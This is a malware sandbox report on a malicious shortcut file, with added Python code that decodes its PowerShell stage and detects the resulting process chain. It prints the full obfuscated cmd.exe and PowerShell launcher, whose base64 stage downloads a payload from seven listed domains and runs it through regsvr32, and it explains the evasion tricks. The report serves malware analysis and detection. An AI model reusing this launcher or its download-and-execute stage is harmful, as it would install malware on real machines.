Analysis Overview
SHA256
e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66
Threat Level: Likely malicious
The file e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66 was classified as likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Checks computer location settings
Command and Scripting Interpreter: PowerShell
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 14:18
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 14:18
Reported
2024-11-13 14:20
Platform
win7-20240903-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2348 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2348 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2348 wrote to memory of 2228 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2228 wrote to memory of 2972 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2228 wrote to memory of 2972 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2228 wrote to memory of 2972 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='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';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
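The base64 in the `powershell.exe -c` argument above is the whole second stage, and the caret-split `p^o^w^e^r^s^h^e^l^l.e^x^e` in the parent cmd.exe line is the only thing hiding it. The Python below is an added example, not part of the sandbox report or of the sample: it replays the two decoding steps offline (cmd.exe caret removal, then `FromBase64String` plus ASCII decode, with `iex` replaced by a regex pass) and returns the URL list, drop directory, file name and loader. The command line is constructed from the behavioral2 process list on this page, split only for line length; the function and field names are the example's own.

```python
"""Recover the indicators from the cmd.exe -> powershell.exe launcher in this report.

Added example: replays the two decoding steps the launcher relies on (cmd.exe
caret-escape removal, then PowerShell's FromBase64String + iex) offline, so the
URL list and drop path can be read without executing the stage.
"""
import base64
import re

# Constructed input: the second cmd.exe command line from behavioral2. The
# base64 blob is split across lines only for readability.
STAGE_B64 = (
    "ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0o"
    "Imh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20v"
    "NTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21h"
    "cnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9u"
    "Y2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktK"
    "NlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtm"
    "b3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5l"
    "eGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ=="
)
CMDLINE = (
    r'"C:\Windows\system32\cmd.exe" /v:on /c '
    "ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00"
    # The junk token fails, || runs goto, and & then runs powershell.exe no
    # matter what: the prefix exists only to break naive string matching.
    "||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c \"&{$xW='" + STAGE_B64 + "';"
    "$Ma=[System.Convert]::FromBase64String($xW);"
    '$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"'
)


def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe's ^ escape outside double quotes.

    cmd.exe drops the caret and takes the following character literally, so
    p^o^w^e^r^s^h^e^l^l.e^x^e runs powershell.exe while a substring match on
    the raw command line for "powershell" misses it. Inside double quotes a
    caret is literal, so quoting state is tracked.
    """
    out, in_quotes, i = [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "^" and not in_quotes and i + 1 < len(cmdline):
            i += 1
            ch = cmdline[i]
        out.append(ch)
        i += 1
    return "".join(out)


def decode_powershell_stage(cmdline: str) -> str:
    """Pull the base64 literal out of the -c argument and decode it the way the
    stage does ([Convert]::FromBase64String, then ASCII), without running it."""
    m = re.search(r"\$xW='([A-Za-z0-9+/=]+)'", cmdline)
    if m is None:
        raise ValueError("no base64 stage found in command line")
    return base64.b64decode(m.group(1), validate=True).decode("ascii")


def extract_iocs(stage: str) -> dict:
    """Read the download list, drop location and loader out of the decoded stage."""
    urls = re.findall(r'"(https?://[^"]+)"', stage)
    drop_dir = re.search(r'\$t="([^"]+)"', stage)
    drop_file = re.search(r"-OutFile \$d\\([^;\s]+)", stage)
    loader = re.search(r"(?i)\bregsvr32\.exe", stage)
    return {
        "urls": urls,
        "domains": sorted({re.match(r"https?://([^/]+)", u).group(1) for u in urls}),
        # $d="$env:TMP\..\$t" is one level above %TMP%, i.e. %LOCALAPPDATA%\<dir>;
        # the Files section of this report confirms C:\Users\Admin\AppData\Local\IwnMs\.
        "drop_dir": drop_dir.group(1) if drop_dir else None,
        "drop_file": drop_file.group(1) if drop_file else None,
        "loader": loader.group(0).lower() if loader else None,
    }


if __name__ == "__main__":
    stage = decode_powershell_stage(strip_carets(CMDLINE))
    print(stage)
    for key, value in extract_iocs(stage).items():
        print(key, value)
```

The decoded stage iterates the seven URLs in order, writes the first successful download to `%LOCALAPPDATA%\IwnMs\cHKEstjhfJ.uDD`, hands it to `Regsvr32.exe` and breaks out of the loop, which is why the Network section for behavioral2 shows each domain being tried in turn.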
Network
Files
memory/2972-40-0x000007FEF5DCE000-0x000007FEF5DCF000-memory.dmp
memory/2972-42-0x0000000001D90000-0x0000000001D98000-memory.dmp
memory/2972-41-0x000000001B680000-0x000000001B962000-memory.dmp
memory/2972-43-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-44-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-46-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-45-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-47-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
memory/2972-48-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 14:18
Reported
2024-11-13 14:20
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2244 wrote to memory of 3636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2244 wrote to memory of 3636 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 3636 wrote to memory of 3612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3636 wrote to memory of 3612 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 3612 wrote to memory of 4244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
| PID 3612 wrote to memory of 4244 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\regsvr32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c "&{$xW='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';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"
C:\Windows\system32\regsvr32.exe
"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IwnMs\cHKEstjhfJ.uDD
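The process list above, read together with the WriteProcessMemory rows (2244 -> 3636 -> 3612 -> 4244), is the chain a process-creation rule should key on: cmd.exe launched from the .lnk, a second cmd.exe with the caret-split command line, powershell.exe decoding and `iex`-ing the stage, then regsvr32.exe loading a `.uDD` file from `%TMP%\..\IwnMs` (which resolves to `C:\Users\Admin\AppData\Local\IwnMs\`, as the Files section confirms). The Python below is an added example, not the sandbox's own signature logic: it runs three per-event checks over constructed Sysmon-style events (four mirror the PIDs and command lines recorded here, with the base64 blob omitted; two are invented benign controls) and then walks the parent chain so the regsvr32 hit is reported with its full ancestry. Field names, the trusted-extension list and the user-writable-path pattern are the example's assumptions. The `__PSScriptPolicyTest_*.ps1` file listed under Files is written by powershell.exe itself when it probes script execution policy, so it is not treated as a drop here.

```python
"""Flag the LNK -> cmd.exe -> cmd.exe -> powershell.exe -> regsvr32.exe chain in
process-creation telemetry.

Added example: three per-event checks that correspond to this report's
signatures (obfuscated cmd.exe command line, base64 + iex PowerShell,
regsvr32 handed a non-DLL from a user-writable path), then a walk up the
parent chain that ties the hits together.
"""
import ntpath
import re
from typing import Dict, List

# Constructed Sysmon-style events. The first four mirror the behavioral2 process
# list (PIDs, images, command lines; base64 blob omitted); the last two are
# invented benign controls.
EVENTS: List[Dict] = [
    {"pid": 2244, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd /c C:\Users\Admin\AppData\Local\Temp\e3ed70c4f3def90f095d83a7539a99ba7dd76c8ca345f92458e6f2135c890f66.lnk"},
    {"pid": 3636, "ppid": 2244, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": (r'"C:\Windows\system32\cmd.exe" /v:on /c ehGG/roADSvchwtY4+9p3wHUictq4tqWddREKHzC9tLWlUd+pVah1coZrvwoaD30SW14tx00'
                 r'||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW=' "'<base64 omitted>'"
                 r';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"')},
    {"pid": 3612, "ppid": 3636, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'powershell.exe -c "&{$xW=' "'<base64 omitted>'"
                 r';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"')},
    {"pid": 4244, "ppid": 3612, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": r'"C:\Windows\system32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\..\IwnMs\cHKEstjhfJ.uDD'},
    {"pid": 5100, "ppid": 1000, "image": r"C:\Windows\system32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
    {"pid": 5200, "ppid": 1000, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
]

CARET_SPLIT = re.compile(r"(?:\w\^){3,}\w")  # p^o^w^e^r...: caret between letters, repeated
GOTO_TRICK = re.compile(r"\|\|\s*goto\s*&")   # junk||goto&real: & runs "real" regardless of exit code
B64_EXEC = re.compile(r"(?i)FromBase64String.*?(?:\biex\b|Invoke-Expression)", re.S)
TRUSTED_EXT = {".dll", ".ocx", ".ax"}          # assumption: what regsvr32 is normally handed
USER_WRITABLE = re.compile(r"(?i)\\AppData\\|\\Temp\\|\\Users\\Public\\")  # assumption


def obfuscated_cmd(ev: Dict) -> bool:
    c = ev["cmdline"]
    return ev["image"].lower().endswith("cmd.exe") and bool(CARET_SPLIT.search(c) or GOTO_TRICK.search(c))


def base64_iex_powershell(ev: Dict) -> bool:
    return ev["image"].lower().endswith("powershell.exe") and bool(B64_EXEC.search(ev["cmdline"]))


def regsvr32_target(ev: Dict) -> str:
    """Return the module path regsvr32 was given, with ..\\ components resolved."""
    tokens = [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', ev["cmdline"])]
    args = [t for t in tokens[1:] if not t.startswith("/")]
    return ntpath.normpath(args[-1]) if args else ""


def suspicious_regsvr32(ev: Dict) -> bool:
    if not ev["image"].lower().endswith("regsvr32.exe"):
        return False
    target = regsvr32_target(ev)
    ext = ntpath.splitext(target)[1].lower()
    return ext not in TRUSTED_EXT or bool(USER_WRITABLE.search(target))


def analyze(events: List[Dict]) -> List[Dict]:
    findings = []
    by_pid = {e["pid"]: e for e in events}
    for ev in events:
        if obfuscated_cmd(ev):
            findings.append({"pid": ev["pid"], "rule": "obfuscated_cmd"})
        if base64_iex_powershell(ev):
            findings.append({"pid": ev["pid"], "rule": "base64_iex_powershell"})
        if suspicious_regsvr32(ev):
            findings.append({"pid": ev["pid"], "rule": "regsvr32_untrusted_module", "target": regsvr32_target(ev)})
            # Walk up the parent chain as far as the telemetry allows; a regsvr32
            # whose ancestry contains powershell.exe and cmd.exe is the launcher
            # recorded in this report.
            chain, cur = [ev["pid"]], ev
            while cur["ppid"] in by_pid:
                cur = by_pid[cur["ppid"]]
                chain.insert(0, cur["pid"])
            images = [ntpath.basename(by_pid[p]["image"]).lower() for p in chain]
            if "powershell.exe" in images and "cmd.exe" in images:
                findings.append({"pid": ev["pid"], "rule": "lnk_cmd_powershell_regsvr32_chain", "chain": chain})
    return findings


def rules_for(findings: List[Dict], pid: int) -> List[str]:
    return sorted(f["rule"] for f in findings if f["pid"] == pid)


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f)
```

The per-event checks are deliberately narrow (a caret run inside an executable name, `FromBase64String` followed by `iex`, regsvr32 given something other than a `.dll`/`.ocx`/`.ax` or anything under a user-writable path); the parent-chain walk is what turns three medium-confidence hits into one high-confidence alert, and it also hands the analyst the resolved drop path to pivot on.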
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | masterflix.com | udp |
| NL | 185.232.250.84:80 | masterflix.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.250.232.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | masyuk.com | udp |
| SG | 128.199.252.32:80 | masyuk.com | tcp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.252.199.128.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lekarkivet.se | udp |
| DK | 185.20.205.16:80 | lekarkivet.se | tcp |
| DK | 185.20.205.16:443 | lekarkivet.se | tcp |
| US | 8.8.8.8:53 | martyr.dk | udp |
| FI | 65.108.197.134:80 | martyr.dk | tcp |
| US | 8.8.8.8:53 | martingrant.com | udp |
| US | 8.8.8.8:53 | 16.205.20.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.197.108.65.in-addr.arpa | udp |
| US | 52.20.84.62:80 | martingrant.com | tcp |
| US | 8.8.8.8:53 | www.atom.com | udp |
| US | 8.8.8.8:53 | lemoncine.com | udp |
| US | 104.22.72.252:443 | www.atom.com | tcp |
| US | 31.170.160.89:80 | lemoncine.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.169.67:80 | c.pki.goog | tcp |
| US | 31.170.160.89:443 | lemoncine.com | tcp |
| US | 8.8.8.8:53 | 62.84.20.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.72.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.160.170.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| US | 8.8.8.8:53 | mandom.co.id | udp |
| GB | 172.217.169.35:443 | www.recaptcha.net | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 172.217.169.67:80 | o.pki.goog | tcp |
| ID | 103.150.194.50:80 | mandom.co.id | tcp |
| US | 8.8.8.8:53 | 35.169.217.172.in-addr.arpa | udp |
| ID | 103.150.194.50:443 | mandom.co.id | tcp |
| US | 8.8.8.8:53 | 50.194.150.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/3612-0-0x00007FFA81943000-0x00007FFA81945000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4212dy3d.okg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3612-10-0x0000025FAECA0000-0x0000025FAECC2000-memory.dmp
memory/3612-11-0x00007FFA81940000-0x00007FFA82401000-memory.dmp
memory/3612-12-0x00007FFA81940000-0x00007FFA82401000-memory.dmp
memory/3612-13-0x0000025FC9E20000-0x0000025FCA5C6000-memory.dmp
C:\Users\Admin\AppData\Local\IwnMs\cHKEstjhfJ.uDD
| MD5 | 9e9b48ae75ae39fd45ebf6799c9668d8 |
| SHA1 | 7ed5cac9a268359ac09719dbbf354a83c23b1236 |
| SHA256 | bd19fca5c89301abcf7cceaa75294bc7981f1a4bea7ffeb29260c9716960f761 |
| SHA512 | c4b49773eba7ac113669f30444142bfb830b51f577795bcce45ebe382271f2f07a785fe47d10b5d18817e13bb7551563814552d174eee9f6e6f08c448ab31723 |
memory/3612-40-0x00007FFA81940000-0x00007FFA82401000-memory.dmp